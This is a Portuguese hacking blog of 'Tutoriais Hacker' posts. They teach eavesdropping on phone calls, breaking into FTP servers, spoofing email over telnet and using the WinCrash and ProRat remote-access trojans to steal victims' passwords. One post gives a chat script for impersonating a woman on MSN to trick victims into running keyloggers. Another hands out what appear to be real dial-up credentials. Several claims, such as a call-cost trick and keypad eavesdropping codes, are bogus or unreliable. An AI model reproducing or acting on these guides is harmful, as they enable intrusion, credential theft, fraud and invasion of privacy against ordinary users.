Pesquisar este blog

sexta-feira, 29 de maio de 2009

O que é um sniffer?




Certamente que todos já ouviram falar em sniffers de rede… Mas afinal o que é isto?

O que é um sniffer?

Um sniffer não é nada mais nem menos que uma aplicação (também pode ser hardware) que analisa e monitoriza todo o tráfego que passa num segmento da nossa rede. Pode ser usado por Hackers para "capturar/roubar" dados importantes pois no meio dos pacotes capturados podem estar passwords e outros dados pessoais de um determinado utilizador mas, é também uma ferramenta de eleição usada por quase todos os administradores de redes, pois permite detectar e posteriormente resolver muito problemas que por vezes acontecem numa determinada rede.


Com um sniffer, podemos monitorizar o acesso a determinados serviços de rede como por exemplo e-mail, acesso remoto (telnet, rlogin), transferência de ficheiros (FTP), etc. Permite-nos ainda identificar a existem de tráfego anormal na nossa rede. Um exemplo vulgar, é alguém mal intencionado andar pela nossa rede à procura de dados, como por exemplo passwords, para mais tarde poder usar. Imaginem que os dados que passam na nossa rede não estão criptografados? Óptimo para o hacker !!!

Os sniffers mais conhecidos para sistemas Linux são o tcpdump, ethereal. Para Windows também existe o ethereal, ou winshark que foi concebido pelos mesmos autores do ethereal. Se fizerem uma pesquisa no Google irão encontrar muitas referências a sniffers. Aqui têm uma lista com alguns deles. O processo de "sniffing" está associado a uma ou mais interfaces de rede de um determinado computador.

Postado por BTHacker às 13:38
0 comentários

Marcadores: Tutoriais Hacker

Quarta-feira, 14 de Maio de 2008

Encontrando um IP



Ultimamente nas salas de bate-papo (chats), ouve-se muitos "lamerzinhos" de merda fazendo ameaças a usuários comuns do tipo: "Vou rastrear seu ip... e depois viu te nunkar". Arghhh!! eu não agüento ler estas mensagens, principalmente vindo de lamers. Por isso que resolvi escrever este texto para usuários aprendam a se denfeder de lamers.
Para começar eu quero lembrar que hoje em dia os chats mais modernos, tem um esquema de segurança muito bom como: Filtro de comandos HTML e travas de scripts, com isso não é em todo chat que estas dicas vão funcionar...

.
1-) Rastrear Ip em salas que não aceitam comandos de HTML
.
No windows existe um programa chamado ARP, este programa é o 1º passo rastrear um IP. Como usar:
.
Espere a vitíma lhe mandar um Msg e depois vá até o prompt do MS-DOS e digite :
ARP -A
.
Será listado todos os IPs que lhe mandaram mensagens.
.
2-) Rastrear IP em salas que aceitam comandos de HTML

Tente fazer assim....
A ultima pessoa que vc conversou vai se a ultima a apareçe...

Usem com moderação

Postado por BTHacker às 19:45
1 comentários

Marcadores: Tutoriais Hacker

4 maneiras de rastrear chamadas de celular



Fazendo escuta clandestina em telefones celulares.

Aviso: Escuta clandestina é um crime previsto por lei e da cana! Por isso aprenda a correr seus riscos, eu não me responsabilizo por nemhum de seus atos.

Ultilizando aparelhos motorola.

Primeiro tire a bateria do seu celular , depois de abrir o celular ira ter umas partes de metal embaixo do celular ,Três riscos de metal ||| , pegue um pedaço de papel alumínio e bote nos riscos de metal ,depois bote a bateria ,e ligue o celular, ira acontecer umas coisas , digite #1008# e depois de digitar o numero é só ouvir as conversas telefônicas.

Ultilizando aparelhos Ericson.

1 - Pressione a tecla FCN e com ela pressionada apertar os números 90- 40- 59.
2 - Solte a tecla FCN. Deverá aparecer na tela a mensagem TESTE INPUT.
3 – Aperte então 1 * 1 # 01 # #.
4 - Pronto, você entrou no canal 01, para ir mudando de canais basta ir apertando a tecla de volume até achar alguma conversa interessante.
5 - Para tirar do modo de escuta, você deve retirar a bateria do celular.

Ultilizando aparelhos de televisão.

Este texto contém informações consideráveis que ensinam como fazer escuta celular
via TV(pode se necessário usar o manual da TV). Nos avisamos que fazer escuta
celular é ilegal de acordo com a ECPA, e estas informações são exclusivamente para
uso e propósito educacional não nos responsabilizamos pelo mal uso das
informações aqui contidas. TV VHF canais 70 - 83 pegue a melhor distribuição do
melhor tronco usado pelos celulares. Este é o que distribui nesse fluxo. Sintonize
esses canais ajustando-os a sua atual freqüência e você estar preparado para fazer
a escuta. Cada canal da TV obrigara 5Mhz com ótimo controle de sintonia. Se
mesmo assim você não tiver uma freqüência exata você precisará ler sobre
freqüência e você terá uma boa idéia de como obter uma exata. Se a sensibilidade não
estiver boa mesmo você estando na cidade, ou perto de uma freqüência exata você
pegara alguma coisa. Você poderá também pegar transmissões de negócios no
tronco móvel se o mesmo estiver fechado, as transmissões não serão ilegais a
menos que a conversa esteja codificada então você poderá usar a velha TV para
achar outro local de negócios que use freqüências entre 800Mhz ou mais.

Ultilizando um rádio comum.

Os telefones em questão, são telefones sem fio. Eles transmitem suas ondas por
FM. Sendo assim, o que você tem que fazer é descobrir a freqüência. Mas, tem as
suas restrições. À não ser que seja um rádio com uma antena muito forte, ele tem
que ficar perto da base do telefone. Uma freqüência que descobri é 93,9MHz, mas
não quer dizer que todas sejam assim. E não é ligar apenas ligar o rádio e escutar.
Leva-se um tempinho para poder sintonizar. Mas depois de sintonizada no ponto
exato, você poderá escutar perfeitamente.

Postado por BTHacker às 19:42
0 comentários

Marcadores: Tutoriais Hacker

Como gastar menos com celular



Para fazer uma ligação gastando a metade do preço é muito simples, pegue o número a ser discado no nosso exemplo seria 982-5567. Dai você pega o último dígito, no nosso caso é "7" e subitrai de 10. Então "10 - 7 = 3", dai é só adicionar ao número inicial do telefone.
O resultado daria : 982-55673.
Mas se o ultimo dígito for "0", Fudeu? Não! Dai é mais simples, é só você adicionar zero ao final do número.
Ex: Telefone : 982-8790. Logo teremos: 982-87900. Simples não ?

Postado por BTHacker às 19:32
0 comentários

Marcadores: Tutoriais Hacker

Invasão Por FTP 2 parte Oque é cavalo de troia!!!




 


Invasão Por FTP


 

Cavalo de tróia


 

Para começar vamos definir o que é cavalo de tróia. Cavalo
de tróia nada mais é do que um programa que emula o layout de
um sistema para capturar senhas ou outras informações.

Geralmente o hacker passa o programa como se fosse uma mensagem (e-mail) ou "joguinho" novo
para o usuário que deseja invadir. Quando o usuário acessa o
cavalo de tróia este grava os dados e se conecta com seu criador, este
tipo de ataque só é viável para hackers que tem um ótimo
conhecimento em java e C+ +, e outras linguagens que oferecem ferramentas de
comunicação remota.


 

Farejamento de redes


 

Para acelerar a sua transmissão, os dados que entram nas redes, provenientes
de vários computadores, são agrupados em pacotes. O hacker cria
programas farejadores que monitoram a circulação desses pacotes
nas redes e procuram neles palavras como password e senha. Quando encontra,
o programa copia o pacote e o envia para o computador do hacker. Os dados chegam
codificados, mas isso não é problema para ele, que, em geral
conhece bem criptografia, o conjunto de técnicas que permite codificar
dados.


 

Investigação Social


 

É muito comum que usuários poucos experientes usem como sua
senha de acesso o nome dos filhos, da mulher, a data de aniversário
dele ou da esposa, ou alguma coisa relacionada com sua vida pessoal.


 

Programas invasores


 

É uma técnica muito usada no Brasil, onde as senhas na maioria
da vezes tem 6 caracteres e não são muito complicadas. O programa
invasor é um sistema que monta inúmeras combinações
de caracteres e números, até chegar a senha do usuário.
Mas a coisa não é tão simples assim, para o hacker fazer
um ataque deste tipo, ele nunca deve fazer de sua conta oficial e de sua casa.
O certo é fazer de um notebook, num telefone público de preferência
longe de sua residência e com intervalo de tempo longo, como 2 dias para
cada ataque, assim não se levanta suspeita.


 

Invadir um servidor via FTP


 

O hacker pode invadir um servidor de uma provedora via FTP e roubar o arquivo
de senha do servidor. geralmente o nome do arquivo é "passwd" ou "logs",
também é válido lembrar que estes arquivos vem criptografados,
dai você vai precisar de uma ferramente que descriptografe o arquivo,
(esta ferramenta á fácil encontrada na internet) lembrando que
não é 100% eficiente.

Obs. tome muito cuidado quando for invadir um servidor para roubar um arquivo
de senhas, porque se te rastrearem, você tá fudido até sua
5º geração, é cadeia na certa, e se você for
de menor quem vai se fuder vão ser seus pais, por isso pense antes de
sair por ai invadindo servidores de provedoras.


 

Dedução


 

É realmente a técnica mais utilizada por hackers experientes,
o hacker usa a lógica para quebrar a senha, contando com 3 dados fundamentais.


 

1 - Muitos usuários usam o login como senha ex. (login: peixe senha:
peixe)

2 - Muitos administradores usam a senha padrão do sistema.

3 - A maioria das senhas estão relacionadas com login ex. (login. Kurt
senha: Cobain)


 

Invadindo um F.T.P


 

Para Hackear um Servidor FTP, Primeiro vc deve saber o indereço do
Host ou seu IP, para

isto use o IPSCAN, digitando o IP Principal do Host:

.


 

Lista de Alguns FTP's:


 

ftp.mandic.com.br



ftp.bestway.com.br



ftp.internetclub.com.br



ftp.netscape.com



ftp.angelfire.com


 

Existem vários Programas de FTP'S, se não quizer saber de ftp
porra nehuma use o do DOS.

Va ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir
um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br.

Ao conectar ele pedirá a senha e o Password, tente user os passwords
UNIX, se não der vc

deve entrar INVISIVEL !

Como entrar invisível ?

No login precione ENTER, no password precione Novamente...

Ira aparecer o prompt ftp> novamente...., ai é só digitar...

quote user ftp , precione ENTER e digite:

quote cwd ~root

Precione ENTER novamente e digite:

quote pass ftp

Pronto, vc esta Hackeando...

Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não
esta

Hackeando.., pois esta aplicada a proteção..., para isto tente
com outro user tipo quote cwd

~sys e os outros da lista UNIX....

Não tente Hackear usando o user normal de FTP'S, que é login
: anonymous e password: seu

E-Mail, pois vai ser aplicado a proteção....

Ao entrar vc vai estar no Diretório do login, tipo \home\root\,

Dai, para ver a lista de users vc volta um dir vá para o dir \home\

e cada dir é um usuário,... não tentem pegar as senhas
, pois são Cryptografadas...

Pois a maioria dos users usa a mesma senha login....

Ok... se vc não sabe os comandos, ai vai a dica...., se vc estiver no
MS-DOS, digite ? e

tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear
!!!

Não fique mais que 5 Min em um servidor, pois ele caçara seu
IP, e seu login, e vai ser

CADEIA !!!


 

Obs: NUNCA APAGUE NADA!


 


 


 


 

Postado por BTHacker às 19:13
0 comentários

Marcadores: Tutoriais Hacker

Domingo, 11 de Maio de 2008

Descobrindo o poder do Ms-dos




Bom meus queridos vizitantes hj nessa tarde de Domingo dia 11 nós tomamos coragem e atualizamos o site com algumas coisas novas do vosso interesse quero que vc si divirta-se quebrando a proteção de alguns modens atráves do Ms de comando


 


 


 

Invadindo por IP-TCP


 


 



Todo mundo que tem o ms-dos instalado em seu computador, por isso, quase todo
mundo,

não sabe que tem um potente rastreador de endereço IP em sua
máquina.

Mas antes de tudo o que é endereço ip? Endereço IP é um
número que você recebe na

hora em que conecta ao seu servidor. Um exemplo de endereço IP é 200.200.200.200.
Os

três primeiros números representam o D.N.S. de seu servidor, e
o último o número que

varia. No Brasil, todos os IPs começam com 200.

Para rastrear você deve usar um programa chamado arp, que faz parte do
ms-dos. O

comando que deve ser digitado é arp -a. Você verá uma lista
de endereços IP. Mas como

saber qual é o IP da pessoa? Você deve ter certeza de que a última
informação que

chegou no seu modem veio da pessoa que você quer descobrir o IP, e daí entrar
com o

comando no prompt do ms-dos. O IP da pessoa será o primeiro.

Também existem outros programas como o netstat. Com ele você pode
rastrear qual é o

servidor da pessoa e outros. Mas esse programa é mais complicado, se
você quer saber

como usá-lo digite netstat -h , e a tela de ajuda aparece.

O que fazer com o endereço IP? Você pode nukar a pessoa. O nuke é um
programa que

envia uma mensagem de erro a porta 139, fazendo a conexão da vítima
cair. Você também

pode invadir o computador da pessoa usando o Back Orifice ou outro programa.


 

Cuidado, seu host e seu ip foram rastreados:


 

Postado por BTHacker às 12:14
0 comentários

Marcadores: Tutoriais Hacker

Domingo, 27 de Abril de 2008

Manual do Wincras



Manual do Wincras


 



O WinCrash é um programa dividido em duas partes, um Cliente e um Servidor... O
Cliente é o programa que você irá usar pra se conectar ao


Servidor pela internet ou por uma


rede interna com protocolo TCP/IP.

Para se conectar ao Servidor (server.exe) ele prescisa estar rodando no
computador que você deseja se conectar. O Servidor é invisivel, não aparecendo
nem no CTRL+ALT+DEL(lista de processos visiveis rodando)... Quando o Servidor é
executado, ele se auto-instala no


sistema, se executando toda vez que o
Windows reiniciar...

Para se conectar ao Servidor basta saber o IP (Internet Protocol). Os serviços
funcionam através de pacotes encriptados, usando como chave o IP local e o IP
remoto...

A Interface do Cliente é simples e fácil de entender, até pra quem não sabe
Inglês, pois as descrições dos serviços estão em Português...

Você pode usar o Cliente para operar o Servidor, tendo muito mais controle do
que a própria pessoa que está em frente ao micro remoto(Servidor)... Mas também
pode usa-lo só para se divertir com seus amigos.



Os Comandos:

ATENÇÃO.

Para cada comando no Cliente, existe um para desfazer

EX: Para o Open CD-Rom Drive, existe o Close CD-ROM Drive



Keyboard Lights Bomb

Faz com que as luzes do CAPS_LOCK e SCROLL_LOCK fiquem piscando sem parar de
meio em meio segundo.



Lock Mouse

Trava o mouse numa área pequena da tela, fazendo com que o Mouse não consiga
sair de lá, até que seja acionado o serviço "Mouse Unlock" no Cliente.



Move Mouse

Lhe dá opções variadas de mover o ponteiro do mouse do Servidor



Monitor OFF

Desliga o Monitor do Servidor



Flip Screen

Inverte a tela do Servidor



Open CD-ROM Drive

Abre a gaveta do CD-ROM do Servidor



Flood Server Printer

Imprime uma página com xingamentos na impressora do Servidor

Atenção. Certifique-se antes se a impressora do Servidor está ligada, pois se
não, o Servidor vai ficar travado ate a impressora seja ligada.



System Keys OFF

Desabilitas as sequencias de teclas do sistema, ex: CTRL+ALT+DEL, ALT+TAB e as
teclas especiais de alguns teclados (tecla ÿ )



Clipboard Lock

Trava a Área de Transferencia do Servidor com a mensagem "WinCrash"



Screen Saver Bomb

Ativa proteção de tela ( se existir ) do Servidor de 2 em 2 segundos



Hide Taskbar

Some com a barra de tarefas do Servidor



Hide Start Button

Some com o Botão Iniciar do Servidor



Disable Start Button

Desativa o Botão Iniciar do Servidor



Active the Screen Saver

Ativa proteção de tela ( se existir ) do Servidor



Remove Desktop Wallpaper

Remove o papel de parede do Servidor



Change Desktop Wallpaper

Lhe dá a possibilidade de escolher o papel de parede do Servidor

Atenção

A imagem prescisa estar no diretório Windows do Servidor. Ponha somente o nome
da

imagem para mudar o papel de parede

EXEMPLO : ondas.bmp



Modify Remote Date

Modifica a data do Servidor para 1/7/94. A data do lançamento do Real.



Close Server EXE

Fecha o Servidor até que o Windows reinicie



Delete Server EXE

Deleta o aplicativo Servidor WinCrash da vítima



Lock Up the System *

Trava o Computador do Servidor

Close all Programs *

Fecha todos os programas e faz log-out do Windows no micro do Servidor



Exit Windows *

Fecha o Windows do Servidor



Shutdown Windows *

Desliga o Windows



MSG Box [Chat]

Abre uma janela de chat pra você poder conversar com o Servidor. Dentro da
janela de chat tem 3 botões

(Flood, Beep, Joke)

Flood - Faz com que o Servidor fique muito lento, exibindo milhares de mensagens
continuas na tela do Servidor

Beep - Toca um BEEP no Servidor . O Servidor também pode mandar um BEEP para
você

Joke - Faz com que a cada 2 minutos seja exibida uma mensagem irritante no
Servidor



Send Text

Você poder mandar um texto para a janela ativa do Servidor

EXEMPLO. Você manda o texto "WinCrash Rulez" para o Servidor, se o Servidor
estiver com por exemplo o "Bloco de Notas" aberto a mensagem "WinCrash Rulez"
vai aparecer no texto



Get Server Information

Pega o nome, a empresa, a data da BIOS, o processador e quantidade de memória do
Servidor. Se você apertar o Botão "Save Information on TXT" o WinCrash ira gerar
um arquivos chamado "Info.txt" no diretório do WinCrash.



View Remote Passwords

Lhe permite ver todas as senhas Dial-Up, navegador, e todas as senhas arquivadas
em cache...

Só visualiza aquelas senhas que foram salvas com o comando "Salvar Senha".

Se você apertar o Botão "Save Passwords on TXT" o WinCrash ira gerar um arquivos
chamado "Senhas.txt" no diretório do WinCrash contendo as senhas



View Remote Netstat

Lhe permite ver o Estato das portas e da conexão do Servidor . Você podera
descobrir se o Servidor está com o NetBus ou o BO Instalado..



View Active Process

Lhe permite ver os processos ativos (programas que estão rodando, até
escondidos) do Servidor, como o Servidor WinCrash



Open Server Hard Disk

Quando é acionado ele abre um FTP Server no Servidor. Isso quer dizer que você
poderá se conectar pelo seu Navegador de Internet ou seu programa de FTP
preferido no C:\ do Servidor. EXEMPLO: "ftp://IP_DO_SERVIDOR" e pronto, você
estara mexendo no Hard Disk do Servidor... Para prevenir futuros problemas feche
o servidor quando acabar de mexer, clicando em "Close Server Hard Disk"



Play Wav Files

Para você tocar um som do tipo Wav no Servidor.

EXEMPLO : C:\Windows\Media\tada.wav



Delete and Execute Files

Com esse comando você podera executar e deletar arquivos no Servidor. No comando
executar e deletar ja vem alguns programas e arquivos frequentemente encontrados
nos computadores. Mas você poderá por um programa específico que queira executar
ou deletar

EXEMPLO : Windows\Calc.exe

Atenção, não ponha C:\



Modify Remote Autoexec.bat

Modifica o Autoexec.bat do Servidor, transformando-o em varias linhas
irritantes, mas nada grave.

* O Cliente irá se desconectar após esses comandos



Perguntas mais frequentes (FAQ)

P : Como descubro o IP do Servidor?

R : Você pode usar o ICQ. Pegue um crack pra ele na nossa página para mostrar o
IP de todas as pessoas na sua lista no info.

Pode também usar o IRC, usando a tag: /dns <nick da pessoa>



P : Como faço para me conectar?

R : Depois de descobrir o IP do Servidor, pegue o IP e ponha no campo "Target IP"
do Cliente WinCrash.



P : Como faço para me conectar a mim mesmo?

R : Você prescisa rodar o Servidor(server.exe) na sua máquina. Para se conectar
sem usar a Internet use o IP "127.0.0.1"(loopback). Os comandos são exatamente
os mesmos.

Obs. Para remover o programa do sistema, use o serviço: Delete Server EXE



P : Como faço para remover o Server.exe ( Servidor )

R : Use o comando Delete Server EXE.



P : O comando "View Remote Passwords" não exibe nenhuma senha, o que eu faço?

R : Tente se conectar de novo. Mas provavelmente a causa do problema seja que o
Servidor não tenha salvo suas senhas com o comando "Salvar Senhas".



P : Os comandos "View Remote Passwords", "View Remote Netstat" e "View Active
Process" mostram seus items desalinhados, porque?

R : Isso acontece quando a conexão com o servidor é muito rápida (Ex : Você
estar conectado com você mesmo ). Provavelmente isso irá se alinhar quando você
estiver conectado com alguém da Internet.

Postado por BTHacker às 12:16
0 comentários

Marcadores: Tutoriais Hacker

FakeMail pelo Telnet



FakeMail pelo Telnet




Um jeito bem simples para mandar FakeMails. Para quem não sabe
fakemail eh mandar um e-mail fingindo ser uma outra pessoa.

A versão do Telnet (do Windows XP ou 9x) ou o sistema operacional
NÃO vai mudar o meio de fazer o FakeMail, só vai mudar o programa.


No Windows XP vá em: Iniciar, Executar, Telnet.exe

Você vai ver a tela:


 

Código:

Selecionar tudo


 

Bem-vindo ao Cliente MS Telnet



O caractere de

escape
é 'CTRL+ç'



Microsoft Telnet>


 



Digite: open
smtp.servidordeemails.com.br 25


No caso do

servidor
que eu me conectei recebi a resposta:

220 smtp.provesul.com.br
ESMTP Postfix




(Esse comando pode variar para: HELLO, EHLO, HELO)

HELO
localhost

MAIL FROM:
seuemail@fakeaqui.com


RCPT TO:
vitimadofake@mailaqui.com


SUBJECT:
assunto

DATA

Digite o conteudo da
mensagem aqui

qundo voce acabar termine com um "." em uma linha em branco e de
enter
.

QUIT



Pronto, e-mail fake enviado!!!

Algumas coisinhas importantes:

1. Para resetar as
configurações de quem vai receber e tudo mais digite "RSET"

2. Existem alguns
servidores SMTPs que bloqueiam o envio de e-mails sem colocar o
login e senha, então de nada vai adiantar tentar com esse
servidor...

3. Alguns servidores SMTPs
também bloqueiam alguns comandos, no SMTP que eu estava testando
eu consegia mandar os e-mail e tudo mais, mas não conseguia por o
assunto, quando eu colocava o comando "SUBJECT: Assunto" eu era
desconnectado, mesmo assim isso não impediu o envio do e-mail!

4. Não é possivel anexar
arquivos pelo Telnet (se existe eu não sei como faz ;P)





Divirtam-se!![/b]


 


 


 


 


 


 

Postado por BTHacker às 12:14
0 comentários

Marcadores: Tutoriais Hacker

CRIANDO UM HD VIRTUAL DE 1 GB



CRIANDO UM HD VIRTUAL DE 1 GB


 


 

E ai galera blz... quero a opnião de vcs sobre meu tutorial pra ve se eu
aprendi a lição direito Aceito Criticas Elogios e Sugestões, pois sem isso
não tem como eu melhorar a qualidade dos meus tópicos.



Bom primeiramente o intuito desse tutorial é ensinar a vocês a criarem uma hd
virtual pra compartilharem programas, arquivos e tudo mais... bom chega de fala
vamos trabalhar...





Primeiro vamos acessar o site.





http://www.4shared.com



Agora na tela principal, vamos clicar em sign up.







Em seguida colocamos nosso e-mail, senha "password" e escolhemos o plano free,
depois so clica em sign up de novo...







Certo agora estamos na nossa HD virtual.. ooohhhhh!!!!



Abaixo vou passar algumas configurações basicas, o resto num tem muito segredo e
qualquer duvida estamos aqui.



Bom primeiro vamos ativar o compartilhamento e configurar um "alias" pra ficar
mais facil quando os outros quiserem acessar nossa HD.



Na tela principal da nossa HD clique em activate.







Em seguida vamos cair nessa tela...







Numerei na imagem pra poder explicar melhor.



1 = É onde escolhemos se vamos ou não compartilhar nossos arquivos.



2 = Aqui vc pode optar por colocar uma senha para os outros acessarem sua HD...
Se vc deixar desabilitado qualquer um tem acesso... e nesse shared link, e o
link pra o pessoal acessar sua HD, mas no bloco 3 agente cria um alias q e bem
mais facil de passar pra alguem acessar...



3 = Como dito acima aqui nos criamos um alias pra nossa HD... um exemplo, o link
da minha HD seria:

http://www.4shared.com/dir/3668459/b2faea71/sharing.html


Mas com o alias fica somente:


http://scarecrow.4shared.com
(Muito mais facil)



4 = Aqui e um dos passos mais importantes pq é aqui que nos vamos definir o
nivel de acesso dos que forem acessar nossa HD... mas como vcs podem ver são
permissões basicas então não tem muito segredo pra configurar...eu autorizei qse
tudo pq coloquei senha...mas vai de cada um..



Bom depois de configurar é só clicar em save e depois em my 4shared no lado
esquerdo em cima para voltar a pasta...



Agora na tela principal novamente, vamos ver os menus q temos...











1 = em upgrade nos defimos algumas configurações como a senha da nossa conta
"não e a senha do compartilhamento para os outros acessarem", o nome q sera
exibido como publisher quando os outros acessarem, e-mail e por ai vai...



2 = Aqui nos fazemos os uploads dos nossos arquivos" sugiro q crie pastas antes
(adiante o botão q cria pastas ) para melhor organização...no upload normal vc
upa um arquivo de cada vez e no multiupload vc faz varios de uma unica vez "como
se vcs não soubessem... " desde de que os arquivos tenham no maximo 50MB
"isso vcs num sabiam" ...



3 = item 3 como uma barra de ferramentas... vou falar delas da esquerda pra
direita:

Copiar, Recorta, Colar, Excluir, CRIAR PASTA, E-mail, thumbsnail, Folders....




Bom acho q é só galera... como eu disse no começo num tem muito segredo... agora
e so vcs criarem as HDS e sairem compartilhando pelos foruns....

Para quem quiser fuçar ma minha HD a Senha é: invasao



Num tem muita coisa lá so uns programas basicos, mas fiquem a vontade para
baixar....





Abraços a Todos







Espero q tenham gostado

Postado por BTHacker às 12:13
0 comentários

Marcadores: Tutoriais Hacker

INTERNET DE GRAÇA NO CELULAR



INTERNET DE GRAÇA NO CELULAR


 


 

Galera segue mais um tuto,mais não sei se funciona porque meu cel é cdma,e
tem que ser gsm,passei isso pra um amigo e ele disse que funfou

se alguem mais puder testar...



NET GRATIS NO CEL (EXPLICAÇÃO)



MENU > CONFIGURAÇÕES > CONFIGURAÇÃO > CONFIGURAÇÕES PESSOAIS



agora adiciona um novo

PONTO
DE ACESSO (OPÇÕES > ADICIONAR NOVA > PONTO DE ACESSO)



Configuração do ponto de acesso:

NOME DA CONTA: *qualquer um* (DISCADA 0800)



CONFIGURAÇÕES DE PONTO DE ACESSO

PORTADORA DE

DADOS
: Dados GSM



CONFIGURAÇÕES DA PORTADORA:

Número de discagem: 0800992190

Tipo de autenticação: Normal

Tipo de chamada de dados: Analógica

Velocidade da chamada de dados: automática

Nome de usuário: UU/ppp139378

Senha: aQ&J+Yev

Exibir janela de terminal: Não





agora ATIVA



OK?!



tem mais...



agora adiciona WEB (OPÇÕES > ADICIONAR NOVA > WEB)



Nome da conta: Web 0800

Homepage: *qualquer um*

Nome de usuário: dexa em branco

Senha: dexa em branco

Usar ponto de acesso preferido: Sim



agora ATIVA



---



MENU > CONFIGURAÇÕES > CONFIGURAÇÃO > CONFIGURAÇÕES PADRÃO

escolhe 'Configs pessoais'



PONTO DE ACESSO PREFERIDO

Escolhe 'Discada 0800'



-----





beleza?!



so tem um problema... so funciona uns 15min por vez...

heheeheh





Abcos

WORK

Postado por BTHacker às 12:11
2 comentários

Marcadores: Tutoriais Hacker

UNS TRUQUES PARA FAKES DE MSN



UNS TRUQUES PARA FAKES DE MSN


 


 

Uma técnica muito usada para mandar Keylogger, Virus, Trojans ou outro tipo
de arquivo, eh usando o MSN Fake, onde geralmente faz um msn colocando no nick
frases muito gays e fotos de mulheres que sempre são "Gostosas", então vou
ensinar algumas técnicas que eu uso para MSN Fake que tem sempre 100% de
chance de funcionar.. simplesmente não tem como não conseguir..



Abaixo algumas coisas que não se deve esqueçer:



Na Escrita

Você apartir do momento que entro no MSN, tem que agir como mulher... tem que
fingir que é sentimental e sempre usar palavras como "obrigada" ou palavras que
tire a possibilidade que descubra que você é homem por exemplo, "ah eu queria ir
mais axu q naum vai dar rsrs".... mais se falar algo como "ahh tpw eu queria ir
mais nem vai dar xD" ai fica esquesito né? Então também eh muito importante
lembrar de não usar palavras que eh muito usada em msn por homens.. e
substitui-las por palavras meladas xDDD

E Também nunca dispensar a font Rosa hehe, ela ajuda muito



Nas Fotos

Uma ótima dica é nunca usar fotos dessas muiés que cata em site porno ou no
google, sempre de alguem que você conheça e que não tenha as mesmas fotos no
orkut pro exemplo uma prima...Assim a pessoa não fica desconfiada...



Tentando Mandar arquivo .exe

O Mais importante eh nunca ter pressa em mandar o arquivo... nem se demora 1
semana, o importante eh fazer ele pedir ... veja alguns exemplos:



Vítima:

Oi

MSN Fake:

Oie! *o* td bom?

Vítima:

td i vc?

MSN Fake:

tb rsrs.. ta fazendu o que de bom? haha

Vítima:

nada só conversando com vc..

MSN Fake:

ahhh assim eu fico com vergonha rsrs

Vítima:

hehe.. e ai tem alguma foto pra manda?

MSN Fake:

ahhh eu so gorda tenhu vergonha

Vítima:

eh nada vc eh mó gatinha

MSN Fake:

ahh olha q eu acreditu em hahaehaeh

Vítima:

ah manda ai vai ;D

MSN Fake:

tb vai.. só porque vc ta pedindo..

Vítima:

aee vlw!

MSN Fake:

kk d nada...

Nessas horas você envia uma foto.. de preferencia uma
que mostre o corpo inteiro


Vítima:

nussa q bunita! mais bunita que eu parecia na imagem de exibição

MSN Fake:

ahh brigada!!! mais eu sei que só ta falando issu pra me deixa feliz rsrs

Vítima:

q nada.. vc eh mó gata mesmu

MSN Fake:

ahh entaum vou acreditar em rsrs

Vítima:

hehe tem mais?

MSN Fake:

ah depois tiro umas pra vc =]

Vítima:

bl xDDD

MSN Fake:

mais ó.. do que adianta eu ser bunita se eu sou burra? :'(

Vítima:

eh nada vc n eh burra n...se falar algo parecido
acredite, vc ja conseguiu xD[/color]

MSN Fake:

eh q assim, eu to tentando fazer um video com minhas fotinhas.. mais n consigo

Vítima:

ahhh se quiser eu te ajudo [b]ou
Nossa... mais vc n eh burra...

MSN Fake:

ebaaa!!! vou te mandar as fotos com o programa q to usando ta?
Caso não se ofereçer a ajudar fale vc
quer me ajuda? que ta tudo em ingles e n entendo nada...

Vítima:

Então manda ai q eu faço rapidão...OU Blz
vai... vou ver o que consigo fazer

Aqui vc manda um zip com o maximo de fotos possiveis
com um arquivo que noc aso deveria ser algo que intenda que seja um arquivo de
vídeo usando o icone por exemplo do windows media player...


MSN Fake:

Brigada depois que terminar me manda em.. inquanto vc vc recebe vo tomar um
bainhu bem gostoso e ja venhu *o* bjus

Vítima:

Ok





kkkk esse ai eh o que eu mais uso.. sempre funciona n tem como n catar o cara
agora se caso o cara abrir e falar q n conseguiu usar e n perceber q eh algum
tipo de arquivo q ele não esperava arrume alguma desculpa e depois fala que não
precisa mais com outra desculpa que deve ser muito boa, ai se caso ele descobrir
q eh algum tipo de arquivo q elenão esperava não vai zua o kara falando que
passou por exemplo KL... primeiro espera vc pegar por exemplo uma senha antes de
zua ele huaeuhaehuae...







Outras Dicas

Nunce fale nada sobre jogos e qualquer assunto sobre computador fale que vc não
entende muito sobre isso, assim o cara nunca vai suspeitar e também n ficar mto
tempo ON no msn fake pro cara pensar q eh algum cara viciadu hehe...





Então eh isso caso alguem for testar posta resultados kkk Flw.

Postado por BTHacker às 12:09
1 comentários

Marcadores: Tutoriais Hacker

INVASÃO BÁSICA DE UM HACKER



INVASÃO BÁSICA DE UM HACKER


 


 

Olá amigos, estou passando este vnc mais um tuto facin facin, pq eu e um
amigo editamos ele......vcs nunca viram um vnc tão simples de usar como esse!!!!






TUTORIAL:




1- Extraia os dois

arquivos
;



2-Extraia o Acessar e o Server novamente para a Área de Trabalho;



3-Abra o Acessar;



4- Dê o seu jeitinho de Engenharia Social e pegue o Ip da Vítima



5-Faça com que a Vítima aceite o arquivo(Server.exe) e execute;



6-Abra o Acessar, coloque o ip da Vítima e Clique em Acessar;



E Pronto!!!, vc tem acesso ao pc da vítima, faça o que bem entender



O VNC não é um vírus, e quando a vítima o executa ele fecha sozinho e abre um
espaço vazio na barra de tarefas próximo ao relógio do windows.



Link do

Download
:

Postado por BTHacker às 12:08
0 comentários

Marcadores: Tutoriais Hacker

CONEXÃO COM NO-IP



CONEXÃO COM NO-IP


 


 

Não me responsabilizo pelas

informaçoes
abaixo, use do modo mais etico possivel.





Links de programas nescessarios :



ProRat:


http://www.prorat.net/downloads.php?id=ProRat_v1.9_Fix2


Molebox:


http://baixaki.ig.com.br/site/dwnld18199.htm






Bom antes de tudu, vou explicar o que é conexão reversa. E quandu você
liga seu

servidor
a seu ip, quandu uma "vitima" estiver online, se seu trojan
estiver instalado, as informaçoes da pessoa, como o ip dela, irao para
você seu ip, e você poderar ver estar informações pelo ProRat





Antes de tudu, entre no

site


http://www.no-ip.com
. Va em signup ! Após fazer sua conta
normalmente e ativando ela pelo imail você irar criar seu ip fixo.

COMO ASSIM IP FIXO ?? Sempre que você se conecta a internet, você recebe
um ip. Este site fara um ip unico para você, você escolhera um nome do seu
ip Ex: nefrei.no-ip.info. Mas como isso funciona ?? Logado na sua conta va
